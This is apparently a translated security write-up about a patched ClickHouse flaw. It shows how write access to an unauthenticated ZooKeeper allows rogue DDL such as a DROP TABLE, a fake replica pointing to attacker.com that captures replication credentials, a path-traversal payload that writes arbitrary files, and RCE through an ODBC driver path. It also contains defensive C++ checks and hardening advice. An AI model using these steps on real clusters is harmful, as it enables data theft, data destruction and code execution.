Why should you keep the zoo cages closed?


This article describes a known vulnerability in the ClickHouse replication protocol and also shows how the attack surface can be extended.

ClickHouse is a database for storing large volumes of data, most often using several replicas. Clustering and replication in ClickHouse are built on top of Apache ZooKeeper (ZK) and require write permissions.

The default ZK installation does not require authentication, so thousands of ZK servers used to configure Kafka, Hadoop and ClickHouse are publicly accessible.

To reduce your attack surface, you should configure authentication and authorization when setting up ZooKeeper.

There are 0days based on Java deserialization, but consider the case where the attacker can read from and write to the ZooKeeper instance that is used for ClickHouse replication.

When configured in cluster mode, ClickHouse supports distributed DDL queries, which pass through ZK: nodes are created for them under the path /clickhouse/task_queue/ddl.

For example, you create the node /clickhouse/task_queue/ddl/query-0001 with the content:

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

and after that, the table test will be dropped on the cluster servers host1 and host2. DDL also supports running CREATE/ALTER/DROP queries.

Sounds scary? But where can an attacker get the server addresses?

ClickHouse replication works at the level of individual tables, so when a table is created in ZK, a server is named that will be responsible for exchanging metadata with the replicas. For example, when executing the following query (ZK must be configured, chXX is the replica name, foobar is the table name):

CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

the nodes columns and metadata will be created.

Content of /clickhouse/tables/01/foobar/replicas/chXX/hosts:

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Is it possible to pull the data from this cluster? Yes, if the replication port (TCP/9009) on the server chXX-address is not closed by a firewall and authentication for replication is not configured. How can the authentication be bypassed?

An attacker can create a new replica in ZK by simply copying the contents of /clickhouse/tables/01-01/foobar/replicas/chXX and changing the value of host.

Content of /clickhouse/tables/01-01/foobar/replicas/attacker/host:

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Then the other replicas have to be told that there is a new data block on the attacker's server that they need to fetch: a node is created in ZK at /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX is a monotonically increasing counter, which must be greater than the last one in the event log):

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

where source_replica is the name of the attacker's replica created in the previous step, block_id is the identifier of the data block, and get is the "get block" command (and here are the commands for other operations).

Next, each replica reads the new event in the log and goes to the server controlled by the attacker to fetch the data block (the replication protocol is binary and runs on top of HTTP). The server attacker.com will receive requests:

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

where XXX is the authentication data for replication. In some cases, this may be an account with access to the database via the main ClickHouse protocol and the HTTP protocol. As you have seen, the attack surface becomes very large because ZooKeeper, which is used for replication, was left without authentication configured.
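One way to spot a replica registered as described above is to compare the host field of every replica node against the cluster inventory. This is an added example, not code from the article or from ClickHouse; parse_host_node, audit_replicas, sample_replicas and the inventory set are hypothetical names, and the node contents are assumed to have been read from ZK already by the operator's own tooling.

```cpp
// Added example, not ClickHouse or ZooKeeper code; all names are hypothetical.
#include <map>
#include <set>
#include <sstream>
#include <string>
#include <vector>

// Parse the "key: value" lines of a replica host node as shown in the article.
std::map<std::string, std::string> parse_host_node(const std::string & content)
{
    std::map<std::string, std::string> fields;
    std::istringstream in(content);
    std::string line;
    while (std::getline(in, line))
    {
        const auto sep = line.find(": ");
        if (sep != std::string::npos)
            fields[line.substr(0, sep)] = line.substr(sep + 2);
    }
    return fields;
}

struct Finding { std::string replica; std::string reason; };

// replicas: replica name -> host node content, already read from ZK by the
// operator's own tooling. inventory: hosts that really belong to the cluster.
std::vector<Finding> audit_replicas(const std::map<std::string, std::string> & replicas,
                                    const std::set<std::string> & inventory)
{
    std::vector<Finding> findings;
    for (const auto & [name, content] : replicas)
    {
        const auto fields = parse_host_node(content);
        const auto host = fields.find("host");
        if (host == fields.end())
            findings.push_back({name, "host field missing"});
        else if (inventory.count(host->second) == 0)
            findings.push_back({name, "host not in inventory: " + host->second});
    }
    return findings;
}

// Constructed sample input mirroring the two host nodes from the article.
std::map<std::string, std::string> sample_replicas()
{
    const std::string tail = "\nport: 9009\ntcp_port: 9000\ndatabase: default\ntable: foobar\nscheme: http\n";
    return {{"chXX", "host: chXX-address" + tail}, {"attacker", "host: attacker.com" + tail}};
}
```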

Let's look at the function that fetches a data block from a replica; it is written with full confidence that all replicas are under proper control and that there is trust between them.

[Figure: replication processing code]

The function reads the list of files, then their names, sizes and contents, and then writes them to the file system. It is worth describing separately how data is stored in the file system.

There are several subdirectories in /var/lib/clickhouse (the default storage directory from the configuration file):

flags - directory for recording flags, used for recovery after data loss;
tmp - directory for storing temporary files;
user_files - operations with files in queries are restricted to this directory (INTO OUTFILE and others);
metadata - sql files with table descriptions;
preprocessed_configs - processed derived configuration files from /etc/clickhouse-server;
data - the actual directory with the data itself; here a separate subdirectory is simply created for each database (for example /var/lib/clickhouse/data/default).

For each table, a subdirectory is created in the database directory. Each column is a separate file depending on the engine format. For example, for the table foobar created by the attacker, the following files will be created:

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

The replica expects to receive files with the same names when processing a data block and does not validate them in any way.

The attentive reader has probably already noticed the unsafe concatenation of file_name in the function WriteBufferFromFile. Yes, this allows an attacker to write arbitrary content to any file on the FS with the rights of the user clickhouse. To do this, the replica controlled by the attacker must return the following response to the request (line breaks have been added for readability):

\x01
\x00\x00\x00\x00\x00\x00\x00\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper

and after the concatenation of ../../../../../../../../../tmp/pwned the file /tmp/pwned will be written with the content hellofromzookeeper.
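The unvalidated concatenation described above, next to a hardened form that confines every received name to the part directory. This is an added example, not ClickHouse source and not the project's actual fix; unsafe_target, safe_target, is_accepted and the directory used in testing are hypothetical.

```cpp
// Added example, not ClickHouse source; all function names are hypothetical.
#include <filesystem>
#include <stdexcept>
#include <string>

namespace fs = std::filesystem;

// Pattern described in the text: the name sent by the remote replica is
// appended to the part directory without any validation.
fs::path unsafe_target(const fs::path & part_dir, const std::string & file_name)
{
    return fs::path(part_dir.string() + "/" + file_name);
}

// Hardened form: accept only a single plain path component, then verify that
// the normalized result still sits directly inside the part directory.
fs::path safe_target(const fs::path & part_dir, const std::string & file_name)
{
    if (file_name.empty() || file_name == "." || file_name == ".."
        || file_name.find('/') != std::string::npos
        || file_name.find('\\') != std::string::npos
        || file_name.find('\0') != std::string::npos)
        throw std::invalid_argument("unsafe file name from replica: " + file_name);

    fs::path base = part_dir.lexically_normal();
    if (!base.has_filename())          // "/a/b/" normalizes with a trailing slash
        base = base.parent_path();
    const fs::path target = (base / file_name).lexically_normal();
    if (target.parent_path() != base)
        throw std::invalid_argument("path escapes part directory: " + file_name);
    return target;
}

// True if the name received from a replica would be accepted.
bool is_accepted(const fs::path & part_dir, const std::string & file_name)
{
    try { safe_target(part_dir, file_name); return true; }
    catch (const std::invalid_argument &) { return false; }
}
```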

There are several options for turning the ability to write files into remote code execution (RCE).

External dictionaries to RCE

In older versions, the directory with the ClickHouse settings was stored with the rights of the user clickhouse by default. The settings files are XML files that the service reads at startup and then caches in /var/lib/clickhouse/preprocessed_configs. When changes occur, they are re-read. With access to /etc/clickhouse-server, an attacker can create their own external dictionary of the executable type and then execute arbitrary code. Current versions of ClickHouse do not grant these rights by default, but if the server was upgraded gradually, such rights may remain. If you maintain a ClickHouse cluster, check the rights on the settings directory; it should belong to the user root.

ODBC to RCE

When the package is installed, the user clickhouse is created, but its home directory /nonexistent is not created. However, when using external dictionaries, or for other reasons, administrators create the directory /nonexistent and give the user clickhouse write access to it (SSZB! translator's note).

ClickHouse supports ODBC and can connect to other databases. In ODBC, you can specify the path to the database driver library (.so). Older versions of ClickHouse allowed you to do this directly in the query, but now a stricter check of the connection string has been added to odbc-bridge, so it is no longer possible to specify the driver path from a query. But can the attacker write to the home directory using the vulnerability described above?

Let's create the file ~/.odbc.ini with content like this:

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

then, when SELECT * FROM odbc('DSN=lalala', 'test', 'test'); is run, the library test.so will be loaded and RCE obtained (thanks to bugloc for the tip).

These and other vulnerabilities were fixed in ClickHouse version 19.14.3. Take care of your ClickHouse and ZooKeepers!

Source: www.habr.com
